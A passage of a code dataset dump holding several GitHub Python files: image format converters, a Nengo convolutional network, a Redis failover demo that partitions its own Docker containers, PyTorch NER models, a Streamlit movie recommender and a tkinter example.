\"\"\"\n with open(input_filename, \"r\") as input_file:\n dataArray = np.fromfile(input_file, np.uint16)\n\n png = PIL.Image.new(\"RGB\", (width, height))\n\n for i, word in enumerate(np.nditer(dataArray)):\n r = (word >> 11) & 0x1F # type: ignore[operator]\n g = (word >> 5) & 0x3F # type: ignore[operator]\n b = word & 0x1F # type: ignore[operator]\n png.putpixel((i % width, i // width), (r << 3, g << 2, b << 3))\n\n png.save(output_filename)\n\n return Image(\n width=width,\n height=height,\n format=ImageFormat.PNG.value,\n url=output_filename,\n )\n\n\ndef convert_png_to_grayscale16(input_filename: str, output_filename: str) -> Image:\n \"\"\"\n Converts the given PNG file to 'grayscale-16' format.\n There are 2 pixels per byte, 4 bits (black, white, 14 shades of gray) each.\n \"\"\"\n\n png = PIL.Image.open(input_filename)\n # Convert to grayscale.\n png = png.convert(mode=\"L\")\n\n input_image_content = png.getdata()\n output_image_content = np.empty(int(len(input_image_content) / 2), np.uint8)\n i = 0\n for y in range(0, png.size[1]):\n byte = 0\n done = True\n for x in range(0, png.size[0]):\n l = png.getpixel((x, y))\n if x % 2 == 0:\n byte = l >> 4\n done = False\n else:\n byte |= l & 0xF0\n output_image_content[i] = byte\n done = True\n i += 1\n if not done:\n output_image_content[i] = byte\n\n with open(output_filename, \"wb\") as output_file:\n output_file.write(cast(Buffer, output_image_content))\n\n return Image(\n width=png.width,\n height=png.height,\n 
format=ImageFormat.GRAYSCALE16.value,\n url=output_filename,\n )\n\n\ndef convert_grayscale16_to_png(\n input_filename: str, output_filename: str, width: int, height: int\n) -> Image:\n \"\"\"\n Converts 'grayscale-16' file to PNG.\n There are 2 pixels per byte, 4 bits (black, white, 14 shades of gray) each.\n \"\"\"\n\n with open(input_filename, \"r\") as input_file:\n dataArray = np.fromfile(input_file, np.uint8)\n\n png = PIL.Image.new(\"L\", (width, height))\n\n for i, pixel_pair in enumerate(np.nditer(dataArray)):\n p0 = int(pixel_pair & 0xF) << 4 # type: ignore[operator]\n i *= 2\n x = i % width\n y = i // width\n if y >= height:\n # Due to an earlier bug, some stored images have too much data.\n break\n png.putpixel((x, y), p0)\n\n p1 = int(pixel_pair) # type: ignore[call-overload]\n i += 1\n x = i % width\n y = i // width\n if y >= height:\n # Due to an earlier bug, some stored images have too much data.\n break\n png.putpixel((x, y), p1)\n\n png.save(output_filename)\n\n return Image(\n width=width,\n height=height,\n format=ImageFormat.PNG.value,\n url=output_filename,\n )\n\n\ndef convert_pil_image_to_png(image_filename: str) -> str:\n \"\"\"\n Converts a standard image file (one understood by\n the PIL library) to PNG format, if it isn't already, in\n a new file with the .png extension.\n\n Note that this won't work with the specialized grayscale\n and RGB565 formats that Calliope provides for Sparrow hardware,\n as PIL doesn't support these.\n\n Args:\n image_filename: the filename of an image.\n\n Returns:\n the filename of the new or existing PNG file.\n \"\"\"\n extension = get_file_extension(image_filename)\n if extension != \"png\":\n image_filename_png = image_filename + \".png\"\n img = PIL.Image.open(image_filename)\n img.save(image_filename_png)\n image_filename = image_filename_png\n\n return image_filename\n\n\ndef resize_image_if_needed(\n input_image: Image,\n output_image_width: Optional[int],\n output_image_height: Optional[int],\n output_filename: str,\n) -> Optional[Image]:\n \"\"\"\n Resizes a given image iff necessary given output_image_width and\n output_image_height.\n \"\"\"\n resized_image = None\n\n if output_image_width and output_image_height:\n img = PIL.Image.open(input_image.url)\n if img.width != output_image_width or img.height != output_image_height:\n # Fit the image into the bounding box given by (output_image_width,\n # output_image_height)...\n scaling_factor = min(\n output_image_width / img.width, output_image_height / img.height\n )\n resized_width = int(scaling_factor * img.width)\n resized_height = int(scaling_factor * img.height)\n scaled_image_size = (resized_width, resized_height)\n img = img.resize(scaled_image_size)\n\n output_image_size = (output_image_width, output_image_height)\n if output_image_size != scaled_image_size:\n # If the scaled image doesn't match the requested image size,\n # add black bars to either side of it...\n new_image = PIL.Image.new(\n \"RGB\", output_image_size\n ) # A blank image, all black.\n box = (\n (output_image_width - resized_width) // 2,\n (output_image_height - resized_height) // 2,\n )\n\n # Paste the scaled image into the middle of the black image.\n new_image.paste(img, box)\n new_image.save(output_filename)\n resized_width = output_image_width\n resized_height = output_image_height\n else:\n # Otherwise, just save the resized image.\n img.save(output_filename)\n\n resized_image = Image(\n width=resized_width,\n height=resized_height,\n format=input_image.format,\n url=output_filename,\n )\n\n 
return resized_image\n\n\ndef get_image_attributes(image_filename: str) -> Image:\n \"\"\"\n Gets an Image from an image filename.\n \"\"\"\n image = PIL.Image.open(image_filename)\n format = guess_image_format_from_filename(image_filename)\n\n return Image(\n width=image.width,\n height=image.height,\n format=format.value,\n url=image_filename,\n )\n\n\ndef get_image_colors(image_filename: str) -> Sequence[Tuple[int, int]]:\n \"\"\"\n Returns a sequence of (color, count) tuples with colors given in the mode of the image (e.g. RGB).\n \"\"\"\n image = PIL.Image.open(image_filename)\n by_color: Dict[int, int] = defaultdict(int)\n for pixel in image.getdata():\n by_color[pixel] += 1\n return cast(Sequence[Tuple[int, int]], list(by_color.items()))\n\n\ndef image_is_monochrome(image_filename: str) -> bool:\n \"\"\"\n Returns True iff the given image is a single solid color.\n \"\"\"\n colors = get_image_colors(image_filename)\n return colors is not None and len(colors) == 1\n\n\nclass Mode(Enum):\n RAW = \".raw\"\n PNG = \".png\"\n\n\ndef main() -> None:\n \"\"\"\n A little utility test harness for conversion to/from the rgb565 format.\n \"\"\"\n parser = argparse.ArgumentParser(\n description=\"Convert a file from one format to another.\"\n )\n parser.add_argument(\n \"-i\",\n \"--input\",\n required=True,\n dest=\"input_file\",\n help=\"Input file to be converted.\",\n )\n parser.add_argument(\n \"-o\",\n \"--output\",\n nargs=\"?\",\n dest=\"output_file\",\n help=\"Output file to be converted.\",\n )\n parser.add_argument(\n \"--width\",\n dest=\"width\",\n help=\"The image width in pixels.\",\n )\n parser.add_argument(\n \"--height\",\n dest=\"height\",\n help=\"The image height in pixels.\",\n )\n args = parser.parse_args()\n input_filename = args.input_file\n output_filename = args.output_file\n width = int(args.width) if args.width else 0\n height = int(args.height) if args.height else 0\n\n input_basename = os.path.basename(input_filename).rsplit(\".\", 1)\n\n mode = Mode.RAW if (input_basename[1] == \"png\") else Mode.PNG\n\n if output_filename is None:\n output_filename = input_basename[0] + mode.value\n\n output_basename = os.path.basename(output_filename).rsplit(\".\", 1)\n\n if len(output_basename) != 2:\n print(\"Error: Invalid arguments.\")\n exit(1)\n\n if input_basename[1] not in [\"png\", \"raw\"]:\n print(\"Error: Input file must be a .png or .raw file.\")\n exit(1)\n\n if output_basename[1] not in [\"png\", \"raw\"]:\n print(\"Error: Output file must be a .png or .raw file.\")\n print(f\"Output file: {output_basename}\")\n exit(1)\n\n if input_basename[1] == output_basename[1]:\n print(\"Error: Input and output file must be different.\")\n exit(1)\n\n if mode == Mode.PNG:\n convert_rgb565_to_png(input_filename, output_filename, width, height)\n else:\n convert_png_to_rgb565(input_filename, output_filename)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"chrisimmel/calliope","sub_path":"calliope/utils/image.py","file_name":"image.py","file_ext":"py","file_size_in_byte":11270,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"}
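The packing in `convert_png_to_rgb565` above keeps the top 5/6/5 bits of R/G/B. Worked on a single pixel with the same shifts and masks:

```python
# Pack one 8-bit RGB pixel into RGB565, then unpack it again.
r, g, b = 200, 120, 40

rgb565 = ((r >> 3) << 11) | ((g >> 2) << 5) | (b >> 3)
print(hex(rgb565))  # 0xcbc5

r2 = ((rgb565 >> 11) & 0x1F) << 3
g2 = ((rgb565 >> 5) & 0x3F) << 2
b2 = (rgb565 & 0x1F) << 3
print(r2, g2, b2)  # 200 120 40

# These sample values round-trip exactly because their dropped low bits
# are zero; e.g. r = 201 would come back as 200 (the low 3 bits are lost).
```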
+{"seq_id":"26585854633","text":"import nengo\nimport nengo_dl\nimport numpy as np\n\n\nclass ConvNet(object):\n def __init__(self, net, max_rate=100):\n amp = 1 / max_rate\n net.config[nengo.Ensemble].neuron_type = nengo.RectifiedLinear(amplitude=amp)\n net.config[nengo.Ensemble].max_rates = nengo.dists.Choice([max_rate])\n net.config[nengo.Ensemble].intercepts = nengo.dists.Choice([0])\n net.config[nengo.Connection].synapse = None \n self.net = net\n self.layers = []\n self.output_shapes = []\n self.input = None\n \n def make_input_layer(self, source_shape,\n spatial_stride=(1, 1),\n spatial_size=None,\n use_separate_nodes=False,\n index_map=None): \n if spatial_size is None:\n spatial_size = (source_shape[2], source_shape[1])\n\n with self.net:\n if self.input is None:\n self.input = nengo.Node(\n None,\n size_in=source_shape[0]*source_shape[1]*source_shape[2],\n label='input')\n\n j = 0\n w = spatial_size[0]\n h = spatial_size[1]\n if index_map is not None:\n items = index_map\n else:\n items = np.arange(source_shape[1]*source_shape[2])\n\n items.shape = source_shape[1:]\n layer = []\n while j + h <= source_shape[1]:\n row = []\n i = 0\n while i + w <= source_shape[2]:\n if use_separate_nodes:\n sp = nengo.Node(None, size_in=w*h*source_shape[0],\n label='[%d:%d,%d:%d]' % (j,j+h,i,i+w))\n row.append([sp]) \n\n indices = np.array((items[j:j+h][:,i:i+w]).flat)\n all_indices = []\n for q in range(source_shape[0]):\n all_indices.extend(indices+q*source_shape[1]*source_shape[2])\n \n if use_separate_nodes:\n nengo.Connection(self.input[all_indices], sp)\n else:\n row.append([self.input[all_indices]])\n\n i += spatial_stride[0]\n j += spatial_stride[1]\n layer.append(row)\n self.layers.append(layer)\n self.output_shapes.append((source_shape[0],\n spatial_size[0],\n spatial_size[1]))\n \n def make_middle_layer(self, n_features, n_parallel,\n n_local, kernel_stride, kernel_size, padding='valid',\n use_neurons=True, init=nengo.dists.Uniform(-1,1)):\n with self.net:\n prev_layer = self.layers[-1]\n prev_output_shape = self.output_shapes[-1]\n layer = []\n for prev_row in prev_layer:\n row = []\n for prev_col in prev_row:\n col = []\n this_index = 0\n \n index = 0\n for k in range(n_parallel):\n prev_index = 0\n if isinstance(init, nengo.dists.Distribution):\n this_inits = [init] * n_local\n else:\n this_inits = []\n prev_size = init.shape[2] // n_local\n\n for i in range(n_local):\n\n this_init = init[:,:,prev_index:prev_index+prev_size,\n this_index:this_index+n_features]\n prev_index = (prev_index + prev_size)\n this_inits.append(this_init)\n this_index = (this_index + n_features)\n\n conv = nengo.Convolution(n_features, prev_output_shape,\n channels_last=False,\n kernel_size=kernel_size,\n padding=padding,\n strides=kernel_stride,\n init=this_inits[0])\n if use_neurons:\n ens = nengo.Ensemble(conv.output_shape.size, dimensions=1,\n label='%s' % conv.output_shape)\n ens_neurons = ens.neurons\n else:\n ens = nengo.Node(None, size_in=conv.output_shape.size,\n label='%s' % conv.output_shape)\n ens_neurons = ens\n for kk in range(n_local):\n prev_k = prev_col[index%len(prev_col)]\n conv = nengo.Convolution(n_features, prev_output_shape,\n channels_last=False,\n kernel_size=kernel_size,\n padding=padding,\n strides=kernel_stride,\n init=this_inits[kk])\n nengo.Connection(prev_k, ens_neurons, transform=conv)\n index += 1\n col.append(ens_neurons)\n row.append(col)\n layer.append(row)\n self.layers.append(layer)\n self.output_shapes.append(conv.output_shape)\n \n def make_output_layer(self, 
dimensions):\n with self.net:\n self.output = nengo.Node(None, dimensions, label='output')\n for row in self.layers[-1]:\n for col in row:\n for k in col:\n nengo.Connection(k, self.output,\n transform=nengo_dl.dists.Glorot())\n \n def make_merged_output(self, shape):\n with self.net:\n self.output = nengo.Node(None, size_in=shape[0]*shape[1], label='output')\n indices = np.arange(shape[0]*shape[1]).reshape(shape)\n\n count = np.zeros(self.output.size_out)\n\n patch_shape = self.output_shapes[-1].shape\n assert patch_shape[0] == 1\n i = 0\n j = 0\n for row in self.layers[-1]:\n for n in row:\n assert len(n) == 1\n n = n[0]\n items = indices[j:j+patch_shape[2],i:i+patch_shape[1]]\n nengo.Connection(n, self.output[items.flatten()])\n count[items.flatten()] += 1\n i += patch_shape[1]\n j += patch_shape[2]\n i = 0\n assert count.min() == count.max() == 1\n\n","repo_name":"tcstewar/davis_tracking","sub_path":"davis_tracking/spatial_convnet.py","file_name":"spatial_convnet.py","file_ext":"py","file_size_in_byte":7101,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"39"}
+{"seq_id":"13192126746","text":"\"\"\"\nA simple demo for closer\n\"\"\"\n\nimport argparse\nimport asyncio\nimport logging\nimport time\n\nimport docker\nimport redis\nimport redis.asyncio as async_redis\n\n\nclass Runner:\n def __init__(self, stop_closer=False):\n self.docker_client = docker.from_env()\n self.containers = self.discover_containers()\n self.tasks = {}\n self._should_stop_closer = stop_closer\n self.log = logging.getLogger(__name__)\n self.counter = 1\n self.recorded = set()\n\n async def run_load(self, target):\n \"\"\"\n Run test load against target\n \"\"\"\n while True:\n try:\n conn = async_redis.Redis(host=target, socket_timeout=0.1)\n await conn.ping()\n # Actually we are running in single thread here\n # So no locks/atomics are required\n value = self.counter\n self.counter += 1\n await conn.set(f'{value}', '1')\n self.recorded.add(f'{value}'.encode('utf-8'))\n except asyncio.CancelledError:\n return\n except Exception as exc:\n self.log.debug('Inserting for %s failed: %r', target, exc)\n await asyncio.sleep(0.1)\n\n def discover_containers(self):\n \"\"\"\n Get a map of name -> docker container\n \"\"\"\n res = {}\n for container in self.docker_client.containers.list():\n if container.labels.get('com.docker.compose.project') == 'poor-man-redis-closer':\n service = container.labels['com.docker.compose.service']\n if 'host' not in service:\n continue\n res[service] = container\n return res\n\n def stop_closer(self):\n \"\"\"\n Stop closer in containers\n \"\"\"\n for name, container in self.containers.items():\n res = container.exec_run('supervisorctl stop closer')\n if res.exit_code != 0:\n raise RuntimeError(f'Unable to stop closer in {name}: {res.output}')\n\n def wait_redis(self):\n \"\"\"\n Wait for host1 to become primary with 2 replicas\n \"\"\"\n timeout = 60\n deadline = time.time() + timeout\n while time.time() < deadline:\n try:\n ready = True\n conn = redis.Redis(host='host1')\n info = conn.info('replication')\n if info['connected_slaves'] != 2:\n ready = False\n for host in ['host2', 'host3']:\n replica_conn = redis.Redis(host=host)\n info = replica_conn.info('replication')\n if info['master_link_status'] != 'up':\n ready = False\n sentinel_conn = redis.Redis(host=host, port=26379)\n replicas = sentinel_conn.sentinel_slaves('demo')\n if len(replicas) != 2:\n ready = False\n sentinel_conn = redis.Redis(host='host2', port=26379)\n status = sentinel_conn.sentinel_sentinels('demo')\n if len(status) != 2:\n ready = False\n if ready:\n return\n except Exception as exc:\n self.log.warning('Waiting for redis to become ready: %r', exc)\n time.sleep(1)\n raise RuntimeError('host1 is not ready')\n\n def wait_single_primary(self):\n \"\"\"\n Wait for single primary with 2 replicas\n \"\"\"\n timeout = 180\n deadline = time.time() + timeout\n while time.time() < deadline:\n try:\n primaries = []\n for name in self.containers:\n conn = redis.Redis(host=name, socket_timeout=0.1)\n info = conn.info('replication')\n if info['role'] == 'master':\n primaries.append(name)\n if len(primaries) == 1:\n return primaries[0]\n self.log.info('Waiting for single primary. 
Primaries: %s', ', '.join(primaries))\n except Exception as exc:\n self.log.debug('Waiting for single primary: %r', exc)\n time.sleep(1)\n raise RuntimeError('No single primary after network healing')\n\n def isolate(self, target):\n \"\"\"\n Isolate container from other hosts\n \"\"\"\n target_container = self.containers[target]\n addr = target_container.attrs['NetworkSettings']['Networks']['poor-man-redis-closer_default']['IPAddress']\n for name, container in self.containers.items():\n if name != target:\n res = container.exec_run(f'iptables -t filter -I INPUT -s {addr} -j DROP')\n if res.exit_code != 0:\n raise RuntimeError(f'Unable to close {name} from {target}')\n res = container.exec_run(f'iptables -t filter -I OUTPUT -d {addr} -j DROP')\n if res.exit_code != 0:\n raise RuntimeError(f'Unable to close {target} from {name}')\n\n def open(self, target):\n \"\"\"\n Open container for other hosts\n \"\"\"\n for name, container in self.containers.items():\n if name != target:\n res = container.exec_run('iptables -t filter -F INPUT')\n if res.exit_code != 0:\n raise RuntimeError(f'Unable to open {name} for {target}')\n res = container.exec_run('iptables -t filter -F OUTPUT')\n if res.exit_code != 0:\n raise RuntimeError(f'Unable to open {target} for {name}')\n\n def count_lost(self, primary):\n \"\"\"\n Count lost record\n \"\"\"\n conn = redis.Redis(host=primary)\n on_primary = set(conn.keys())\n lost = self.recorded.difference(on_primary)\n print(f'Lost keys {len(lost)}/{len(self.recorded)}')\n\n async def load(self):\n \"\"\"\n Async part of run\n \"\"\"\n for host in self.containers:\n self.tasks[host] = asyncio.create_task(self.run_load(host))\n print('Isolating host1')\n self.isolate('host1')\n print('Waiting for 10 minutes')\n await asyncio.sleep(600)\n for task in self.tasks.values():\n task.cancel()\n\n def run(self):\n \"\"\"\n Run demo\n \"\"\"\n self.wait_redis()\n if self._should_stop_closer:\n self.stop_closer()\n loop = asyncio.new_event_loop()\n asyncio.set_event_loop(loop)\n loop.run_until_complete(self.load())\n self.open('host1')\n print('Waiting for single primary after network heal')\n primary = self.wait_single_primary()\n self.count_lost(primary)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--no-closer', action='store_true', help='Stop closer before running load')\n args = parser.parse_args()\n runner = Runner(args.no_closer)\n runner.run()\n","repo_name":"secwall/poor-man-redis-closer","sub_path":"demo/runner/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":7021,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"22271083811","text":"import torch\nfrom torch.nn.utils.rnn import pack_padded_sequence, pad_packed_sequence\nfrom torch import nn, optim\nfrom torchcrf import CRF\n\nfrom transformers import RobertaModel\n\n\nclass LstmNerModel(nn.Module):\n def __init__(self, embedding_size=256, num_tags=41,\n vocab_size=3675, hidden_size=128,\n batch_first=True, dropout=0.1):\n super(LstmNerModel, self).__init__()\n self.batch_first = batch_first\n self.embedding = nn.Embedding(vocab_size, embedding_size, dtype=torch.float32)\n\n self.lstm = nn.LSTM(embedding_size, hidden_size // 2,\n num_layers=2, batch_first=True,\n bidirectional=True, dropout=dropout)\n for name, param in self.lstm.named_parameters():\n if name.startswith(\"weight\"):\n nn.init.xavier_normal_(param)\n else:\n nn.init.zeros_(param)\n\n self.fc = nn.Linear(hidden_size, num_tags)\n self.crf = CRF(num_tags, batch_first=True)\n\n def forward(self, input_tensor, seq_lens):\n input_tensor = self.embedding(input_tensor)\n total_length = input_tensor.size(1) if self.batch_first else input_tensor.size(0)\n input_packed = pack_padded_sequence(input_tensor, seq_lens, batch_first=self.batch_first, enforce_sorted=False)\n output_lstm, hidden = self.lstm(input_packed)\n output_lstm, length = pad_packed_sequence(output_lstm, batch_first=self.batch_first, total_length=total_length)\n output_fc = self.fc(output_lstm)\n return output_fc\n\n def compute_loss(self, input_tensor, tags, seq_lens):\n mask = torch.zeros(input_tensor.shape[:2])\n mask = torch.greater(input_tensor, mask).type(torch.ByteTensor)\n output_fc = self.forward(input_tensor, seq_lens)\n\n loss = -self.crf(output_fc, tags, mask, reduction='mean')\n return loss\n\n def decode(self, input_tensor, seq_lens):\n out = self.forward(input_tensor, seq_lens)\n mask = torch.zeros(input_tensor.shape[:2])\n mask = torch.greater(input_tensor, mask).type(torch.ByteTensor)\n predicted_index = self.crf.decode(out, mask)\n return predicted_index\n\n\nclass BertNerModel(nn.Module):\n def __init__(self,\n\n num_tags=41,\n batch_first=True,\n ):\n super(BertNerModel, self).__init__()\n self.batch_first = batch_first\n\n self.model = RobertaModel.from_pretrained(\"hfl/chinese-roberta-wwm-ext\")\n self.fc = nn.Linear(768, num_tags)\n self.crf = CRF(num_tags, batch_first=True)\n\n def forward(self, input_tensor):\n input_tensor = self.model(input_tensor)\n input_tensor = self.fc(input_tensor.last_hidden_state)\n return input_tensor\n\n def compute_loss(self, input_tensor, tags):\n mask = torch.zeros(input_tensor.shape[:2])\n if torch.cuda.is_available():\n mask = mask.to('cuda')\n mask = torch.greater(input_tensor, mask).type(torch.cuda.ByteTensor)\n else:\n mask = torch.greater(input_tensor, mask).type(torch.ByteTensor)\n\n output = self.forward(input_tensor)\n loss = -self.crf(output, tags, mask, reduction='mean')\n return loss\n\n def decode(self, input_tensor):\n out = self.forward(input_tensor)\n mask = torch.zeros(input_tensor.shape[:2])\n if torch.cuda.is_available():\n mask = mask.to('cuda')\n mask = torch.greater(input_tensor, mask).type(torch.cuda.ByteTensor)\n else:\n mask = torch.greater(input_tensor, mask).type(torch.ByteTensor)\n\n predicted_index = self.crf.decode(out, mask)\n return predicted_index\n","repo_name":"liwenju0/chinese_ner_bert_lstm_crf","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":3720,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"}
+{"seq_id":"44800500923","text":"\"\"\"\n\n Streamlit webserver-based Recommender Engine.\n\n Author: Explore Data Science Academy.\n\n Note:\n ---------------------------------------------------------------------\n Please follow the instructions provided within the README.md file\n located within the root of this repository for guidance on how to use\n this script correctly.\n\n NB: !! Do not remove/modify the code delimited by dashes !!\n\n This application is intended to be partly marked in an automated manner.\n Altering delimited code may result in a mark of 0.\n ---------------------------------------------------------------------\n\n Description: This file is used to launch a minimal streamlit web\n\tapplication. You are expected to extend certain aspects of this script\n and its dependencies as part of your predict project.\n\n\tFor further help with the Streamlit framework, see:\n\n\thttps://docs.streamlit.io/en/latest/\n\n\"\"\"\n# Streamlit dependencies\nimport streamlit as st\nimport joblib,os\n\n# Data handling dependencies\nimport pandas as pd\nimport numpy as np\nimport streamlit.components.v1 as components\nimport plotly.figure_factory as ff\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport os\n\n\n# Custom Libraries\nfrom utils.data_loader import load_movie_titles\nfrom recommenders.collaborative_based import collab_model\nfrom recommenders.content_based import content_model\nfrom sklearn.preprocessing import MultiLabelBinarizer\n\n# Data Loading\ntitle_list = load_movie_titles('resources/data/movies.csv')\n\n# App declaration\ndef main():\n\n html_template = \"\"\"\n
\n
EDSA Movie Recommendation Challenge
\n
UNSUPERVISED LEARNING PREDICT - TEAM1
\n
\n \"\"\"\n\n title_template =\"\"\"\n
\n
UNSUPERVISED LEARNING PREDICT
\n
TEAM 1
\n
Malibongwe Xulu
\n
Nthabiseng Moela
\n
Simangele Maphanga
\n
Kgauhelo Mokgawa
\n
Manko Mofokeng
\n
14 December 2020
\n
\n \"\"\"\n\n # DO NOT REMOVE the 'Recommender System' option below, however,\n # you are welcome to add more options to enrich your app.\n page_options = [\"Home\",\"Recommender System\",\"About\",\"Exploratory Data Analysis\",\"Solution Overview\"]\n\n # -------------------------------------------------------------------\n # ----------- !! THIS CODE MUST NOT BE ALTERED !! -------------------\n # -------------------------------------------------------------------\n page_selection = st.sidebar.selectbox(\"Choose Option\", page_options)\n if page_selection == \"Recommender System\":\n # Header contents\n st.write('# Movie Recommender Engine')\n st.write('### EXPLORE Data Science Academy Unsupervised Predict')\n st.image('resources/imgs/Image_header.png',use_column_width=True)\n # Recommender System algorithm selection\n sys = st.radio(\"Select an algorithm\",\n ('Content Based Filtering',\n 'Collaborative Based Filtering'))\n\n # User-based preferences\n st.write('### Enter Your Three Favorite Movies')\n movie_1 = st.selectbox('First Option',title_list[14930:15200])\n movie_2 = st.selectbox('Second Option',title_list[25055:25255])\n movie_3 = st.selectbox('Third Option',title_list[21100:21200])\n fav_movies = [movie_1,movie_2,movie_3]\n\n # Perform top-10 movie recommendation generation\n if sys == 'Content Based Filtering':\n if st.button(\"Recommend\"):\n with st.spinner('Crunching the numbers...'):\n top_recommendations = content_model(movie_list=fav_movies,\n top_n=10)\n st.title(\"We think you'll like:\")\n for i,j in enumerate(top_recommendations):\n st.subheader(str(i+1)+'. '+j)\n\n\n\n if sys == 'Collaborative Based Filtering':\n if st.button(\"Recommend\"):\n with st.spinner('Crunching the numbers...'):\n top_recommendations = collab_model(movie_list=fav_movies,\n top_n=10)\n st.title(\"We think you'll like:\")\n for i,j in enumerate(top_recommendations):\n st.subheader(str(i+1)+'. '+j)\n\n\n\n # -------------------------------------------------------------------\n\n # ------------- SAFE FOR ALTERING/EXTENSION -------------------\n \n if page_selection == \"Home\":\n st.markdown(html_template.format('royalblue','white'), unsafe_allow_html=True)\n st.image('resources/imgs/Home.PNG',use_column_width=True) \n #st.markdown(title_template, unsafe_allow_html=True)\n\n if page_selection == \"About\":\n #markup(page_selection)\n st.write(\"### Oveview: Flex your Unsupervised Learning skills to generate movie recommendations\")\n \n # You can read a markdown file from supporting resources folder\n #if st.checkbox(\"Introduction\"):\n st.subheader(\"Introduction to Unsupervised Learning Predict\")\n st.write(\"\"\"In today’s technology driven world, recommender systems are socially and economically critical for ensuring that individuals can make appropriate choices surrounding the content they engage with on a daily basis. 
One application where this is especially true surrounds movie content recommendations; where intelligent algorithms can help viewers find great titles from tens of thousands of options.\"\"\")\n st.write(\"\"\"With this context, EDSA is challenging you to construct a recommendation algorithm based on content or collaborative filtering, capable of accurately predicting how a user will rate a movie they have not yet viewed based on their historical preferences.\"\"\")\n st.write(\"\"\"Providing an accurate and robust solution to this challenge has immense economic potential, with users of the system being exposed to content they would like to view or purchase - generating revenue and platform affinity.\"\"\")\n\n #if st.checkbox(\"Problem Statement\"):\n st.subheader(\"Problem Statement of the Unsupervised Learning Predict\")\n st.write(\"Build recommender systems to recommend a movie\")\n\n #if st.checkbox(\"Data\"):\n st.subheader(\"Data Overview\")\n st.write(\"\"\"This dataset consists of several million 5-star ratings obtained from users of the online MovieLens movie recommendation service. The MovieLens dataset has long been used by industry and academic researchers to improve the performance of explicitly-based recommender systems, and now you get to as well!\"\"\")\n\n st.write(\"\"\"For this Predict, we'll be using a special version of the MovieLens dataset which has enriched with additional data, and resampled for fair evaluation purposes.\"\"\")\n\n st.write(\"\"\"### Source:\"\"\") \n st.write(\"\"\"The data for the MovieLens dataset is maintained by the GroupLens research group in the Department of Computer Science and Engineering at the University of Minnesota. Additional movie content data was legally scraped from IMDB\"\"\")\n\n\n st.write(\"\"\"### Supplied Files:\n genome_scores.csv - a score mapping the strength between movies and tag-related properties. Read more here\n\n genome_tags.csv - user assigned tags for genome-related scores\n\n imdb_data.csv - Additional movie metadata scraped from IMDB using the links.csv file.\n\n links.csv - File providing a mapping between a MovieLens ID and associated IMDB and TMDB IDs.\n\n sample_submission.csv - Sample of the submission format for the hackathon.\n\n tags.csv - User assigned for the movies within the dataset.\n\n test.csv - The test split of the dataset. Contains user and movie IDs with no rating data.\n\n train.csv - The training split of the dataset. 
Contains user and movie IDs with associated rating data.\"\"\")\n\n # st.subheader(\"Raw Twitter data and label\")\n # if st.checkbox('Show raw data'): # data is hidden if box is unchecked\n # st.write(raw[['sentiment', 'message']]) # will write the df to the page\n\n if page_selection == \"Exploratory Data Analysis\":\n st.title('Exploratory Data Analysis')\n\n if st.checkbox(\"ratings\"):\n st.subheader(\"Movie ratings\")\n st.image('resources/imgs/rating.PNG',use_column_width=True)\n\n # if st.checkbox(\"correlation\"):\n # st.subheader(\"Correlation between features\")\n # st.image('resources/imgs/correlation.png',use_column_width=True)\n \n if st.checkbox(\"genre wordcloud\"):\n st.subheader(\"Top Genres\")\n st.image('resources/imgs/genre_wordcloud.png',use_column_width=True)\n \n if st.checkbox(\"genres\"):\n st.subheader(\"Top Genres\")\n st.image('resources/imgs/top_genres.PNG',use_column_width=True)\n \n # if st.checkbox(\"movies released per year\"):\n # st.subheader(\"Movies released per year\")\n # st.image('resources/imgs/release_year.png',use_column_width=True)\n\n if st.checkbox(\"tags\"):\n st.subheader(\"Top tags\")\n st.image('resources/imgs/top_tags.PNG',use_column_width=True)\n\n if st.checkbox(\"cast\"):\n st.subheader(\"Popular cast\")\n st.image('resources/imgs/cast.PNG',use_column_width=True)\n\n # if page_selection == \"Recommend a movie\":\n # st.title(\"Recommend a movie\")\n # sys = st.radio(\"Select an algorithm\",\n # ('Content Based Filtering',\n # 'Collaborative Based Filtering'))\n\n\n if page_selection == \"Solution Overview\":\n st.title(\"Solution Overview\")\n st.write(\"RMSE of the recommendation models to show their performance\")\n st.image('resources/imgs/performance_df.PNG',use_column_width=True)\n\n\n # You may want to add more sections here for aspects such as an EDA,\n # or to provide your business pitch.\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Simangele101/unsupervised-predict-streamlit-template","sub_path":"edsa_recommender.py","file_name":"edsa_recommender.py","file_ext":"py","file_size_in_byte":10562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"70591919475","text":"# https://www.tutorialspoint.com/python/tk_button.htm\nfrom tkinter import *\nimport time\n\nroot = Tk()\nroot.geometry('500x300+1000+500')\n\n\n# 1st Example\ndef check_time():\n btn_time['text'] = time.strftime('%H:%M:%S')\n print(time.strftime('%H:%M:%S'))\n\n\nbtn_time = Button(root, text='Check Time', command=check_time)\nbtn_time.pack()\n\n\n# 2nd Example\nroot.title('Counter')\nclicks = 0\n\n\ndef counter():\n global clicks\n clicks += 1\n root.title(f'Counter: {clicks}')\n\n\nbtn_cnt = Button(root, text='Counter', command=counter)\nbtn_cnt.pack()\n\n\nroot.mainloop()\n","repo_name":"bigalex95/tkinterExamples","sub_path":"tkinter/tkinterExamples/lesson3/lesson3.py","file_name":"lesson3.py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
